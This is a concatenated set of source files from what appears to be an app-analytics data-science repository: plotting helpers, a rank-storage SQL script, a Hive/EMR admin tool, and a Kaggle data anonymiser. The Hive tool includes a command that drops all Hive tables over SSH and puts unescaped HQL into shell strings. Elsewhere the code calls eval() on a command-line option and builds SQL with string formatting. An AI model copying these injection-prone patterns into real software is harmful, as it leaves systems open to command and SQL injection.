:type sort_by: str
:param page: Page to show
:type page: int
:param n_plots_per_page:
:type n_plots_per_page: int
:param plot_size:
:type plot_size: int
:return:
"""
N_COLS = 5
n_rows = int(np.ceil(n_plots_per_page * 1. / N_COLS))
# Filter and rank data.
selection = _select_data(active_users_stats, {'device_type': device})
valid_data = _filter_by_date(selection, date)
# Determine rankings for apps.
ranking = _get_latest_app_rank(valid_data, sort_by)
is_ranked = valid_data.bundle_id.isin(ranking.bundle_id)
ranked_data = valid_data.ix[is_ranked]
chunk_ix = range(min((page - 1) * n_plots_per_page, len(ranking)),
min(page * n_plots_per_page, len(ranking)))
# Create plot.
fig, ax = plt.subplots(n_rows, N_COLS, sharex=True,
figsize=(N_COLS * plot_size, n_rows * plot_size))
ax = ax.reshape(-1)
app_groups = ranked_data.groupby('bundle_id')
for ii_plot, bundle_id in enumerate(ranking.iloc[chunk_ix].bundle_id):
app_data = app_groups.get_group(bundle_id)
name = utils.prettify_app_name(app_data.app_name.iloc[0])
title = '{rank}. {name}'.format(rank=int(chunk_ix[ii_plot]+1), name=name)
if metric == 'AU':
plot_data = app_data.set_index('date')[['au_v1', 'au_v2']]
plot_data.plot(style='-o', ax=ax[ii_plot], title=title, rot=45)
ax[ii_plot].set_ylim(0, plot_data.max().max() * 1.05)
ax[ii_plot].legend(loc='lower left', frameon=True)
elif metric == 'Age & Gender':
plot_data = app_data.set_index('date')[['young', 'male']]
plot_data.plot(style='-o', ax=ax[ii_plot], title=title, rot=45)
ax[ii_plot].set_ylim(0, 1)
ax[ii_plot].legend(loc='lower left', frameon=True)
elif metric == 'Demographics':
plot_data = app_data.set_index('date')[DEMOGRAPHIC_COLUMNS]
plot_data.plot(kind='bar', stacked=True, ax=ax[ii_plot], title=title, rot=45)
ax[ii_plot].set_ylim(0, 1)
ax[ii_plot].legend(loc='lower left', frameon=True)
else:
raise Exception("Unknown metric: " + metric)
return fig, ax
def _select_data(df, selections):
"""
Select data using a dictionary.
:param df: DataFrame
:type df: pandas.DataFrame
:param selections: Keys for the columns to filter, values for the values to filter with
:type selections: dict
:return: Filtered DataFrame
:rtype pandas.DataFrame
"""
is_valid = np.ones_like(df.icol(0)).astype(bool)
for col, value in selections.iteritems():
is_valid &= (df[col] == value)
return df.ix[is_valid].copy()
def _create_dropdowns_from_df(df, dropdown_cols):
"""
Create dropdown widgets for columns in a DataFrame.
:param df: Data
:type df: pandas.DataFrame
:param dropdown_cols: Names of columns
:type dropdown_cols: list
:return: dict containing dropdown widgets
:rtype collections.OrderedDict
"""
widget_list = []
for col in dropdown_cols:
unique_values = df[col].unique().tolist()
unique_values.sort(reverse=True)
w = _create_dropdown(unique_values)
widget_list.append(w)
return OrderedDict(zip(dropdown_cols, widget_list))
def _create_dropdown(values):
"""
Create dropdown widget for a list of values.
:param values: List of values
:return: Dropdown widget
:return: IPython.widgets.Dropdown
"""
values_dict = OrderedDict(zip(map(str, values), values))
w = widgets.Dropdown(options=values_dict)
return w
def _filter_by_date(df, date, n_periods=4):
"""
Get latest data points for a date.
:param df: data
:type df: pd.DataFrame
:param date: Latest date
:type date: datetime.datetime
:param n_periods: # data points to keep
:type n_periods: int
:return: Filtered data
:rtype: pandas.DataFrame
"""
dates = df.date.unique()
dates.sort()
valid_dates = dates[dates <= date][-n_periods:]
is_valid = df['date'].isin(valid_dates)
return df[is_valid].copy()
def _get_latest_app_rank(df, sort_by):
"""
Get ranks for latest date.
:param df: DataFrame with bundle_id and sort_by column
:type df: Sort column
:param sort_by: Column to sort by
:type sort_by: str
:return: Rankings for each bundle ID
:rtype: pandas.DataFrame
"""
latest_data = df.ix[df.date == df.date.max()]
latest_data.set_index('bundle_id', inplace=True)
rankings = latest_data[sort_by].rank(ascending=False, method='first')
rankings.name = 'rank'
rankings.order(inplace=True)
return rankings.reset_index()
<file_sep>/int-vs-m-benchmark/sql/ios/1001i2-store_daily_ranks.sql
/*
Save the ranks of each day to the daily_ranks table.
*/
drop temporary table if exists temp.daily_ranks_temp;
create temporary table temp.daily_ranks_temp (
store_id int not null,
category_id int not null,
feed int not null,
date date not null,
data longtext,
constraint primary key (
store_id,
category_id,
feed,
date)
)
select
cnm.store_id,
cgm.appannie_category_id as category_id,
fdtm.feed,
r.date,
CONCAT('["', group_concat(r.application_id order by r.rank asc separator ' '), '"]') as data
from
temp.rankings r
join aa_benchmarking_ios.feed_device_type_mappings fdtm
using(device_id, type)
join aa_benchmarking_ios.country_mappings cnm
using(country_id)
join aa_benchmarking_ios.category_mappings cgm
on r.category_id = cgm.distimo_category_id
group by
r.date,
fdtm.feed,
cnm.store_id,
cgm.appannie_category_id
;
-- Remove values already present for generated stores and days.
delete
r.*
from
aa_benchmarking_ios.daily_ranks r
join temp.daily_ranks_temp t
using(store_id, date);
-- Insert new values.
insert into aa_benchmarking_ios.daily_ranks
select
t.store_id,
t.category_id,
t.feed,
t.date,
t.data
from
temp.daily_ranks_temp t;
<file_sep>/aa_au_model/hive_scripts/tools/amr_hive_tool.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
import os
import sys
import commands
import getopt
import re
import time
import datetime
import simplejson
import settings
SUPPORTED_TYPES = ['hbase', 's3']
HIVE_TYPE_MAPPING = {
'chararray': 'string',
'long': 'bigint',
'float': 'float',
'double': 'double',
'int': 'bigint'
}
SCHEMA_PATH_MAPPING = {
'_o': 'oss',
'_d': 'dimension',
'_f': 'fact',
'_p': 'migration',
'_i': 'interface',
'_m': 'maintenance'
}
def is_dir(bucket, path):
path = os.path.join(settings.S3_MNT_PREFIX, bucket, path)
s3_bucket_list_result = os.path.isdir(path)
return s3_bucket_list_result
def last_date_range(date_str, days):
date = datetime.datetime.strptime(date_str, '%Y-%m-%d')
for i in range(days):
cur_date = date - datetime.timedelta(days=i)
yield cur_date.strftime('%Y-%m-%d')
def last_hour_range(date_str, days, hours=24):
date = datetime.datetime.strptime(date_str, '%Y-%m-%d')
if hours > 24 or hours < 1:
hours = 24
for i in range(days):
cur_date = date - datetime.timedelta(days=i)
for j in range(hours):
_hour = "%02d" % j
yield cur_date.strftime('%Y-%m-%d'), _hour
def load_default_schema(schemas=settings.DEFAULT_SCHEMAS):
try:
schema_dict = {}
for schema_file_name, parameters in schemas.iteritems():
schema_path = SCHEMA_PATH_MAPPING[schema_file_name.lower().split('.')[0][-2:]]
schema_def_root_path = os.path.join(
os.path.split(os.path.realpath(__file__))[
0], '../schema', schema_path
)
schema_def_file_path = os.path.join(
schema_def_root_path, schema_file_name
)
d = simplejson.loads(
open(schema_def_file_path, 'r').read()
)
if d['type'] not in SUPPORTED_TYPES:
continue
schema_name = schema_file_name.rsplit('_', 1)[0]
if len(parameters) == 0:
schema_dict[schema_name] = d
# replace special variables like "range_type"
else:
for parameter_dict in parameters:
sub_schema_name = '_'.join([schema_name, parameter_dict['table_type']])
del parameter_dict['table_type']
sub_d = d.copy()
for k, v in parameter_dict.iteritems():
if k in sub_d['table']:
sub_d['table'] = sub_d['table'].replace(k, v)
schema_dict[sub_schema_name] = sub_d
return schema_dict
except:
return None
def replace_table_name(hive_file_str):
"""
Replace hive table name
"""
schema_list = re.findall(r'TABLE ###(.+?)###', hive_file_str)
for schema_name in set(schema_list):
hive_file_str = hive_file_str.replace(
'TABLE ###%s###' % schema_name,
'TABLE %s' % schema_name.rsplit('_', 1)[0]
)
return hive_file_str
def generate_hive_table_columns(schema_meta):
schema_type = schema_meta['type']
_columns = []
for _index, _column in enumerate(schema_meta['schema']):
if schema_type == 's3':
_column_segs = _column.strip().split(':')
elif schema_type == 'hbase':
if _index == 0:
_columns.append("key string")
_column_segs = _column[1].strip().split(':')
_column_name = _column_segs[0]
if _column_name == 'timestamp':
# here timestamp is hive keyword, need to be changed
_column_name = 'timestamps'
_column_type = HIVE_TYPE_MAPPING[_column_segs[1]]
_columns.append("%s %s" % (_column_name, _column_type))
return ','.join(_columns)
def generate_hive_table_meta(schema_name, schema_meta, load_date, days, incremental):
schema_type = schema_meta['type']
table_str = schema_meta['table']
if schema_type == 's3':
# '$date' could be in the middle of table name string
if not table_str.endswith('$hour') and '$date' in table_str:
_table_partitions = []
for _range_str in last_date_range(load_date, days):
_table_str = table_str.replace('$date', _range_str)
if is_dir(settings.__dict__[schema_meta['bucket']], _table_str):
_table_partitions.append(
"ALTER TABLE %s ADD PARTITION (dateStr = \\\"%s\\\") location \\\"s3n://%s/%s\\\";"
% (schema_name, _range_str, settings.__dict__[schema_meta['bucket']],
_table_str))
if incremental is True:
return '\n'.join(_table_partitions)
else:
return "PARTITIONED BY (dateStr STRING) ROW FORMAT DELIMITED FIELDS TERMINATED BY \\\"\\t\\\";\n%s" % \
'\n'.join(_table_partitions)
elif table_str.endswith('$hour'):
_table_partitions = []
for _range_str, _hour in last_hour_range(load_date, days):
_table_str = '/'.join([schema_meta['table'].rsplit('/', 2)[0], _range_str, _hour])
if is_dir(settings.__dict__[schema_meta['bucket']], _table_str):
_table_partitions.append(
"ALTER TABLE %s ADD PARTITION (dateStr = \\\"%s\\\", hourStr = \\\"%s\\\") location \\\"s3n://%s/%s\\\";"
% (schema_name, _range_str, _hour, settings.__dict__[schema_meta['bucket']],
_table_str))
if incremental is True:
return '\n'.join(_table_partitions)
else:
return "PARTITIONED BY (dateStr STRING, hourStr STRING) ROW FORMAT DELIMITED FIELDS TERMINATED BY \\\"\\t\\\";\n%s" % \
'\n'.join(_table_partitions)
else:
if incremental is True:
return '\n'
else:
return "ROW FORMAT DELIMITED FIELDS TERMINATED BY \\\"\\t\\\" LOCATION \\\"s3n://%s/%s\\\";" % \
(settings.__dict__[schema_meta['bucket']], table_str)
elif schema_type == 'hbase':
_alias = [':key']
for _column in schema_meta['schema']:
_alias.append(_column[0].strip())
return "STORED BY \\\"org.apache.hadoop.hive.hbase.HBaseStorageHandler\\\"" \
" WITH SERDEPROPERTIES (\\\"hbase.columns.mapping\\\" = \\\"%s\\\")" \
" TBLPROPERTIES (\\\"hbase.table.name\\\" = \\\"%s\\\");" \
% (','.join(_alias), table_str)
def yield_hive_ddl_script(load_date, days=1, default=False, incremental=False):
"""
Generate hive table DDL without template
"""
schemas = load_default_schema()
for schema_name, schema_meta in schemas.items():
table_columns = generate_hive_table_columns(schema_meta)
table_meta = generate_hive_table_meta(
schema_name, schema_meta, load_date, days, incremental)
# drop external table if exist
_drop_table = "DROP TABLE IF EXISTS %s;\n" % schema_name
if incremental is False:
yield (schema_name, "%s CREATE EXTERNAL TABLE %s(%s) %s" % (_drop_table, schema_name, table_columns, table_meta))
else:
# alter existed tables only
yield (schema_name, table_meta)
def create_hive_tables(cluster_id, load_date, days, verbose, default=False, local=False, cluster_type='emr', incremental=False):
scripts = yield_hive_ddl_script(load_date, days, default, incremental)
for table_name, script in scripts:
try:
if local:
status, output = runHiveStepLocal(script, verbose)
else:
status, output = runHiveStep(cluster_id, script, verbose, cluster_type)
if status == 0:
print 'Created External Table %s Successfully!' % table_name
else:
if 'Table %s already exists' % table_name in output:
print 'External Table %s already created!' % table_name
else:
print 'Created External Table %s Failed!' % table_name
except Exception:
print 'Created External Table %s Failed!' % table_name
return status, output
def drop_all_tables(cluster_id, verbose, cluster_type='emr'):
assert cluster_type in ('emr', 'amr'), ('Unknown cluster type: %s' % cluster_type)
output = 'Rate exceeded'
while output.endswith('Rate exceeded'):
if cluster_type == 'emr':
_command_str = '/usr/local/bin/aws emr ssh --cluster-id %s --key-pair-file %s ' \
'--command "hive -e \'show tables\' | /usr/bin/xargs -I \'{}\' hive -e \'drop table {}\'"' % (
cluster_id, settings.EMR_KEY_PAIR_FILE
)
elif cluster_type == 'amr':
_command_str = 'ssh %s -i %s ' \
'"hive -e \'show tables\' | /usr/bin/xargs -I \'{}\' hive -e \'drop table {}\'"' % (
cluster_id, settings.EMR_KEY_PAIR_FILE
)
status, output = commands.getstatusoutput(_command_str)
if verbose:
print _command_str
time.sleep(1)
return status, output
def runHiveStep(cluster_id, hql, verbose, cluster_type='emr'):
assert cluster_type in ('emr', 'amr'), ('Unknown cluster type: %s' % cluster_type)
output = 'Rate exceeded'
while output.endswith('Rate exceeded'):
if cluster_type == 'emr':
_command_str = "/usr/local/bin/aws emr ssh --cluster-id %s --key-pair-file %s " \
"--command 'hive -e \"%s\"'" % (
cluster_id, settings.EMR_KEY_PAIR_FILE, hql
)
elif cluster_type == 'amr':
_command_str = "ssh %s -i %s " \
"'hive -e \"%s\"'" % (
cluster_id, settings.EMR_KEY_PAIR_FILE, hql
)
status, output = commands.getstatusoutput(_command_str)
if verbose:
print _command_str
time.sleep(1)
return status, output
def runHiveStepLocal(hql, verbose):
status = 1
while status == 1:
_command_str = 'hive -e \"%s\"' % (
hql
)
status, output = commands.getstatusoutput(_command_str)
if verbose:
print _command_str
time.sleep(1)
return status, output
def usage():
print """
Usage: python %s [-h|-s|-l|-d|-i|-e|-c|-v|-x|-t|-a]
[--help|--cluster_id|--load_date|--days|--init|--runHql|--clearTables|--verbose|--default_schemas|cluster_type|incremental]
Options:
-h, --help Print help message
-s, --cluster_id Cluster id
-l, --load_date The end date for debug
-d, --days How many days do you want to load from the end date
-i, --init Prepare hive external tables for debugging
-e, --runHql Run Hive Sql, eg. 'show tables'
-c, --clearTables Drop all tables
-v, --verbose Display additional information for debug
-x, --default_schemas Load default schemas
-t, --cluster_type Cluster type, defaule is "emr"
-a, --incremental Alter default tables by adding latest partition
""" % sys.argv[0]
if __name__ == '__main__':
node_count = 0
days = 14
load_date = (
datetime.datetime.today() - datetime.timedelta(days=1)).strftime('%Y-%m-%d')
cluster_id = ""
cluster_type = "emr"
init = False
hql = None
drop = False
verbose = False
default = False
local = False
incremental = False
try:
opts, args = getopt.getopt(sys.argv[1:], "hs:d:l:ie:cvxt:a", [
"help", "cluster_id=" "days=", "load_date=", "init", "runHql=",
"clear_tables", "verbose", "default", "cluster_type=", 'incremental'
])
for o, a in opts:
if o in ('-h', '--help'):
usage()
exit()
if o in ('-s', '--cluster_id'):
cluster_id = a
if o in ('-d', '--days'):
days = int(a)
if o in ('-l', '--load_date'):
load_date = a
if o in ('-i', '--init'):
init = True
if o in ('-e', '--runHql'):
hql = a
if o in ('-c', '--clear_tables'):
drop = True
if o in ('-v', '--verbose'):
verbose = True
if o in ('-x', '--default_schemas'):
default = True
if o in ('-t', '--cluster_type'):
cluster_type = a
if o in ('-a', '--incremental'):
incremental = True
if len(cluster_id) > 0:
if init:
create_hive_tables(cluster_id, load_date, days, verbose, default, local, cluster_type, incremental)
elif hql:
status, output = runHiveStep(cluster_id, hql, verbose, cluster_type)
print output
elif drop:
status, output = drop_all_tables(cluster_id, verbose, cluster_type)
if status == 0:
print "Dropped all tables!"
else:
print "Drop tables failed!"
if verbose:
print output
else:
local = True
if init:
create_hive_tables(cluster_id, load_date, days, verbose, default, local, cluster_type, incremental)
elif hql:
status, output = runHiveStepLocal(hql, verbose)
print output
except getopt.GetoptError:
usage()
<file_sep>/old_investigations/select_monthly_top_apps.py
'''
Created on Jan 4, 2013
@author: perezrafael
'''
import pandas as pd
import os.path
import re
if __name__ == '__main__':
sda_dir = './android/sda'
top = 500
for root, dirs, files in os.walk(sda_dir):
for f in files:
if "_Aggregated.csv" in f:
fullpath = os.path.join(root, f)
df = pd.read_csv(fullpath)[['Unit', 'estimate_avg', 'App ID']]
df_downloads = df[df['Unit']=='Downloads'].sort('estimate_avg', ascending=False)[:top]
df_usd = df[df['Unit']=='USD'].sort('estimate_avg', ascending=False)[:top]
df_merged = df_downloads.merge(df_usd, on='App ID', how='outer')
df_merged = df_merged[['App ID']]
path = re.sub('_Aggregated\.csv$', '', fullpath)
df_merged.to_csv(path+'_top500.csv', index=False)<file_sep>/evaluation/py/internal/feeds_groupby_and_apply.py
"""
Aggregate different feeds (group by unit type)
"""
# Author: <NAME> <<EMAIL>>
import os
import os.path
import pandas as pd
from optparse import OptionParser
from collections import defaultdict
import stores_dict
def parse_options():
parser = OptionParser()
parser.add_option("-p", "--platform", dest="platform",
help="Required. The platform you want to get.")
(opts, args) = parser.parse_args()
try:
return (opts, args)
except Exception:
print(parser.print_help())
def feeds_groupby_and_apply(func):
def call():
opts, args = parse_options()
_check_args(args)
feed_to_unit = eval('stores_dict.%s[\'feed_to_unit\']' % opts.platform.split('_')[0].lower())
input_dir = args[0]
output_dir = args[1]
filenames = filter(lambda s: s.endswith('.csv'), os.listdir(input_dir))
g = _group_filenames_by_unittype(filenames, feed_to_unit)
for (group_name, files) in g:
df = func([pd.read_csv(os.path.join(input_dir, f)) for f in files])
df.to_csv(os.path.join(output_dir, group_name), index=False)
return call
def _check_args(args):
if len(args) != 2:
raise Exception("Wrong number of arguments.")
input_dir = args[0]
output_dir = args[1]
if not (os.path.exists(input_dir) or os.path.exists(output_dir)):
raise Exception("Please make sure that both input and output dirs exist")
def _group_filenames_by_unittype(names, feed_to_unit):
# The second field in the filename is supposed to be feeds.
def normalize_fileanme_to_unit(s):
"""Here we substitute the second field to its unit type.
Example:
For iOS. 143441_100_2012-07-01--2012-07-31.csv
-->
143441_Downloads_2012-07-01--2012-07-31.csv
"""
s_split = s.split('_')
s_split[1] = feed_to_unit[s_split[1]]
return '_'.join(s_split)
d = defaultdict(list)
for s in names:
d[normalize_fileanme_to_unit(s)].append(s)
return d.iteritems()
<file_sep>/exact-matching-improvement/lib/__init__.py
__author__ = 'jjanssen'<file_sep>/old_investigations/android/plot_improvement_daily_vs_overall.R
#!/usr/bin/env Rscript
library(ggplot2)
library(scales)
source("internal/plot_common.R")
r <- read_csv_and_metainfo_from_arg()
df = r$df
metainfo = r$metainfo
# Select only when we have estimate from Overall
sub_df = subset(df, !is.na(estimate_overall))
# Remove outlier
sub_df <- subset(sub_df, abs(estimate_avg - units_avg) / units_avg < 100)
print("Shape beforing selecting.")
print(dim(df))
print("Shape after selecting.")
print(dim(sub_df))
df = sub_df
# Calculate relative eroror and improvement.
df$Overall.Relative.Error <- abs(df$estimate_overall- df$units_avg) / df$units_avg
df$SDA.Relative.Error <- abs(df$estimate_avg - df$units_avg) / df$units_avg
df$SDA.Improvement <- df$Overall.Relative.Error - df$SDA.Relative.Error
f <- paste('plots/',
paste(metainfo$country, metainfo$period, 'improvement_daily_vs_overall.png', sep='_'), sep='')
png(file=f, width=1300, height=1700)
plot_improvement(df, metainfo, "Overall")
dev.off()
<file_sep>/google-analytics/aggregation_plot.py
from matplotlib.colors import LinearSegmentedColormap
from matplotlib import ticker
from matplotlib import pyplot as plt
from matplotlib import colors as mcolors
import numpy as np
def plot_colorbar(colormap, rank):
ctb, norm = mcolors.from_levels_and_colors(levels=rank, colors=colormap, extend='max')
sm=plt.cm.ScalarMappable(cmap=ctb, norm=norm)
sm._A=[]
#Setcolorbar,aspectratio
cbar=plt.colorbar(sm,alpha=0.6, aspect=16, shrink=1.0)
cbar.solids.set_edgecolor("face")
#Removecolorbarcontainerframe
cbar.outline.set_visible(False)
#Fontsizeforcolorbarticklabels
cbar.ax.tick_params(labelsize=30)
#Customizecolorbarticklabels
cbar.formatter = mtick.FormatStrFormatter('%.2e')
cbar.update_ticks()
# Colorbar label, customize fontsize and distance to colorbar
cbar.set_label('Total Active Users', alpha=0.7,
rotation=270, fontsize=20, labelpad=70)
# Remove color bar tick lines, while keeping the tick labels
cbarytks = plt.getp(cbar.ax.axes, 'yticklines')
plt.setp(cbarytks, visible=False)
def plot_agg(full_data, MAUDIFF='Projected MAU DIFF %', AU='Active Users'):
for key in full_data['Country'].unique():
for dev in full_data['Device Type'].unique():
plot_data = full_data.groupby(['App Name', 'Device Type', 'Country']).\
agg({MAUDIFF:['mean', 'std'], AU:'sum'}).\
xs((key, dev), level=('Country', 'Device Type')).sort((AU, 'sum'))
MAU = plot_data[AU]['sum']
if MAU.shape[0] <= 1:
continue
color = MAU.rank() / MAU.rank().max()
cmap = [(1.0, 1.0-x, 0.0) for x in color ]
ax = plot_data[MAU]['mean'].\
plot(kind='bar', yerr=plot_data[MAU]['std'],
figsize=(30,10), color=cmap, fontsize=20,
error_kw=dict(ecolor='gray', lw=6, capsize=10,
capthick=0, alpha=0.4) )
plot_colorbar(sorted(cmap, reverse=True), MAU.sort(inplace=False))
yticks = ticker.FormatStrFormatter('%.2e%%')
ax.yaxis.set_major_formatter(yticks)
ax.set_xlabel('App Name', fontsize=25)
ax.set_ylabel(MAUDIFF, fontsize=25)
ax.set_title('Country = {}, Device = {}: App-level MAU DIFF %'.format(key, dev),
fontsize=30)
plt.show()
<file_sep>/kaggle/loader.py
'''
Created on Jun 13, 2013
@author: perezrafael
'''
import psycopg2
import pandas as pd
from pandas.io import sql
import itertools
import numpy as np
import calendar
import matplotlib.pyplot as plt
feeds_dict = {0:0,
1:1,
2:2,
100:1,
101:0,
102:2}
column_names ={'rank_iphone':'r1',
'rank_ipad':'r2',
'units':'t1a+t2a',
'revenue':'t1b+t2b',
'estimate_iphone_units':'t1a',
'estimate_ipad_units':'t2a',
'estimate_iphone_revenue':'t1b',
'estimate_ipad_revenue':'t2b',
'app_id':'a',
'feed_id':'f',
'category_id':'c',
'store_id':'s',
'date':'date'
}
def hash_map_column(df, column, addletter=False):
initial = column[:1]
column_hash = df[[column]].drop_duplicates().dropna()
shape = column_hash.shape[0]
total = 100
if shape>total:
random_values = np.random.permutation(np.arange(shape))
else:
random_values = np.random.permutation(np.arange(total))[:shape]
column_hash['randomized'] = random_values
if addletter:
column_hash['randomized'] = initial + column_hash['randomized'].map(str)
df = df.merge(column_hash, on=column)
df = df.drop(column, axis=1)
df.rename(columns={'randomized':column}, inplace=True)
column_hash.to_csv('%s.csv'%column, index=False)
return df
def anonymize(df):
hash_columns = ['app_id', 'category_id']
for hash_column in hash_columns:
df = hash_map_column(df, hash_column, False)
#df['feed_id'] = 'f' + df['feed_id'].map(int).map(str)
df['feed_id'] = df['feed_id'].map(int).map(str)
date = df[['date']].drop_duplicates().dropna().sort('date').reset_index().drop('index', axis=1).reset_index().rename(columns={'index':'date-mod'})
date.to_csv('date.csv', index=False)
df = df.merge(date, on='date')
df = df.drop('date', axis=1)
df.rename(columns={'date-mod':'date'}, inplace=True)
df['revenue_random_scaling'] = df['revenue'] * (scaling_revenue*0.995)+(np.random.rand(df.shape[0])*(scaling_revenue*0.01))
df['units_random_scaling'] = df['units'] * (scaling_units*0.995)+(np.random.rand(df.shape[0])*(scaling_units*0.01))
df['revenue_scaled_normalized_by_range'] = 1 + (((df['revenue_random_scaling']-df['revenue_random_scaling'].min())*(10000-1)) / (df['revenue_random_scaling'].max() - df['revenue_random_scaling'].min()))
df['units_scaled_normalized_by_range'] = 1 + (((df['units_random_scaling']-df['units_random_scaling'].min())*(10000-1)) / (df['units_random_scaling'].max() - df['units_random_scaling'].min()))
df = df.drop(['revenue', 'units', 'revenue_random_scaling', 'units_random_scaling'], axis=1)
df.rename(columns={'revenue_scaled_normalized_by_range':'revenue', 'units_scaled_normalized_by_range':'units'}, inplace=True)
df['revenue'] = np.around(df['revenue'], 10)
df['units'] = np.around(df['units'], 10)
df.rename(columns=column_names, inplace=True)
return df
def write_sets(df, name):
df.rename(columns=column_names, inplace=True)
df.drop(['t1a', 't1b', 't2a', 't2b', 's'],axis=1).to_csv('%s_full.csv'%name,index=False)
df[:10000].sort(['date','a']).to_csv('%s_example.csv'%name,index=False)
df.drop(['t1a', 't1b', 't2a', 't2b'],axis=1)[(df['t1a+t2a']>=0) | (df['t1b+t2b']>=0)].to_csv('%s_train.csv'%name,index=False)
df['t1a'] = None
df['t1b'] = None
df['t2a'] = None
df['t2b'] = None
df.drop(['t1a+t2a', 't1b+t2b'], axis=1).to_csv('%s_test.csv'%name,index=False)
def marks_thing(df):
df['situation'] = None
df['situation'][df['rank_iphone']<=100] = 'only_one_in_top_100'
df['situation'][df['rank_ipad']<=100] = 'only_one_in_top_100'
df['situation'][(df['rank_ipad']<=100) & (df['rank_iphone']<=100)] = 'both_in_top_100'
df['situation'][(df['rank_ipad']<=100) & (df['rank_iphone']>100)] = 'one_in_top_100'
df['situation'][(df['rank_ipad']>100) & (df['rank_iphone']<=100)] = 'one_in_top_100'
df['situation'][(df['rank_ipad']>100) & (df['rank_iphone']>100)] = 'none_in_top_100'
df = df[df['situation']>='0']
df = df[df['situation']!='none_in_top_100']
count = df.groupby(['store_id', 'category_id', 'feed_id', 'situation']).size().reset_index()
count.rename(columns={0:'count'}, inplace=True)
total = df.groupby(['store_id', 'category_id', 'feed_id']).size().reset_index()
total.rename(columns={0:'total'}, inplace=True)
total = total.merge(count, on=['store_id', 'category_id', 'feed_id'])
total['percentage'] = ((total['count']*1.0)/total['total']) * 100.0
total.to_csv('stats_%s.csv'%store_id_1, index=False)
df[['store_id', 'category_id', 'feed_id', 'date', 'rank_iphone', 'rank_ipad', 'app_id', 'situation']][(df['rank_ipad']<=100) | (df['rank_iphone']<=100)].to_csv('ranks_%s.csv'%store_id_1, index=False)
if __name__ == '__main__':
conn = psycopg2.connect("dbname=ios_dwh user=aa host=nile")
#query = 'select distinct category_id, feed_id from midnight_rank_list'
store_id_1 = 143466
date = '2013-02-01'
month = '2013-02'
range = calendar.monthrange(int(month.split('-')[0]), int(month.split('-')[1]))[1]
range = '%s-01--%s-%s'%(month, month, range)
data_dir = '/Users/perezrafael/appannie/data_science/evaluation/data/ios_webui_dynamic'
scaling_revenue = 0.72
scaling_units = 0.36
ranks_sales_query = "SELECT date, app_id, rank, list_id, id \
FROM app_sales_date asd, midnight_ranks mr \
WHERE asd.app_id=mr.app_id \
AND asd.date='%s'"%(date)
ranks_query = "SELECT sales_day as date, store_id, feed_id, category_id, rank, app_id \
FROM midnight_rank_list mrl, midnight_ranks mr \
WHERE mrl.id=mr.list_id \
AND mrl.store_id=%s \
AND mrl.sales_day='%s'"%(store_id_1, date)
units_query = "SELECT date, store_id, app_id, units \
FROM app_sales_date asd, downloads d \
WHERE asd.id=d.app_sales_date_id \
AND d.store_id=%s \
AND asd.date='%s'"%(store_id_1, date)
#ranks_df = sql.frame_query(ranks_query, con=conn)
#units_df = sql.frame_query(units_query, con=conn)
df_actuals = pd.read_csv('%s/%s/real_daily_raw/%s_USD_%s.csv'%(data_dir, month, store_id_1, range)).rename(columns={'units':'revenue'}).\
merge(pd.read_csv('%s/%s/real_daily_raw/%s_Downloads_%s.csv'%(data_dir, month, store_id_1, range)), on=['date', 'app_id'], how='outer')
df_free = pd.read_csv('%s/%s/est_daily_raw/%s_0_%s.csv'%(data_dir, month, store_id_1, range)).\
merge(pd.read_csv('%s/%s/est_daily_raw/%s_101_%s.csv'%(data_dir, month, store_id_1, range)),\
on=['date', 'category_id', 'app_id'], suffixes=['_iphone', '_ipad'], how='outer').\
drop(['feed_id_iphone', 'feed_id_ipad'], axis=1).rename(columns={'estimate_iphone':'estimate_iphone_units', 'estimate_ipad':'estimate_ipad_units'})
df_paid = pd.read_csv('%s/%s/est_daily_raw/%s_1_%s.csv'%(data_dir, month, store_id_1, range)).\
merge(pd.read_csv('%s/%s/est_daily_raw/%s_100_%s.csv'%(data_dir, month, store_id_1, range)),\
on=['date', 'category_id', 'app_id'], suffixes=['_iphone', '_ipad'], how='outer').\
drop(['feed_id_iphone', 'feed_id_ipad'], axis=1).rename(columns={'estimate_iphone':'estimate_iphone_units', 'estimate_ipad':'estimate_ipad_units'})
df_grossing = pd.read_csv('%s/%s/est_daily_raw/%s_2_%s.csv'%(data_dir, month, store_id_1, range)).\
merge(pd.read_csv('%s/%s/est_daily_raw/%s_102_%s.csv'%(data_dir, month, store_id_1, range)),\
on=['date', 'category_id', 'app_id'], suffixes=['_iphone', '_ipad'], how='outer').\
drop(['feed_id_iphone', 'feed_id_ipad'], axis=1).rename(columns={'estimate_iphone':'estimate_iphone_revenue', 'estimate_ipad':'estimate_ipad_revenue'})
df_free['feed_id'] = 0
df_paid['feed_id'] = 1
df_grossing['feed_id'] = 2
df = pd.concat([df_free, df_paid, df_grossing]).merge(df_actuals, on=['date', 'app_id'], how='outer')
df['store_id'] = store_id_1
df.sort(['date', 'feed_id', 'category_id', 'rank_ipad', 'rank_iphone'], inplace=True)
#marks_thing(df)
df.to_csv('original.csv', index=False)
df = anonymize(df)
write_sets(df, 'kaggle')
<file_sep>/product_quality/filters.py
'''
Created on Apr 17, 2013
@author: perezrafael
'''
import pandas as pd
import sys
import os
import config
import numpy as np
import matplotlib as mpl
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
def _check_args():
if len(sys.argv) - 1 != 2:
raise Exception("Wrong number of arguments.")
monthly_dir = sys.argv[1]
weekly_dir = sys.argv[2]
if not (os.path.exists(monthly_dir) and os.path.exists(weekly_dir)):
raise Exception("Please make sure that monthly dir and weekly dir exist")
def filter_by_monthly(monthly_file, weekly_file, out_file, top):
df = pd.read_csv(monthly_file)
gdf = df.groupby('store_id')
groups = list()
for name, group in gdf:
group = group.sort('units', ascending=False)
group = group[:top]
groups.append(group)
df = pd.concat(groups)
df.rename(columns={'sbe':'estimate'}, inplace=True)
df['diff'] = df['units'] - df['estimate']
df['rel_diff'] = df['diff'] / df['units']
df['abs_diff'] = df['diff'].abs()
df['abs_rel_diff'] = df['rel_diff'].abs()
df2 = pd.read_csv(weekly_file)
df2['diff'] = df2['units'] - df2['estimate']
df2['rel_diff'] = df2['diff'] / df2['units']
df2['abs_diff'] = df2['diff'].abs()
df2['abs_rel_diff'] = df2['rel_diff'].abs()
df = df.merge(df2, on=['app_id', 'store_id'], how='inner', suffixes=['_monthly', '_weekly'])
df['diff_m_w'] = df['units_monthly'] - df['units_weekly']
#df = df[df['diff_m_w']<100]
df['abs_rel_diff_m_w'] = df['abs_rel_diff_monthly'] - df['abs_rel_diff_weekly']
df['abs_rel_estimates_diff_m_w'] = ((df['estimate_monthly'] - df['estimate_weekly'])/df['estimate_monthly']).abs()
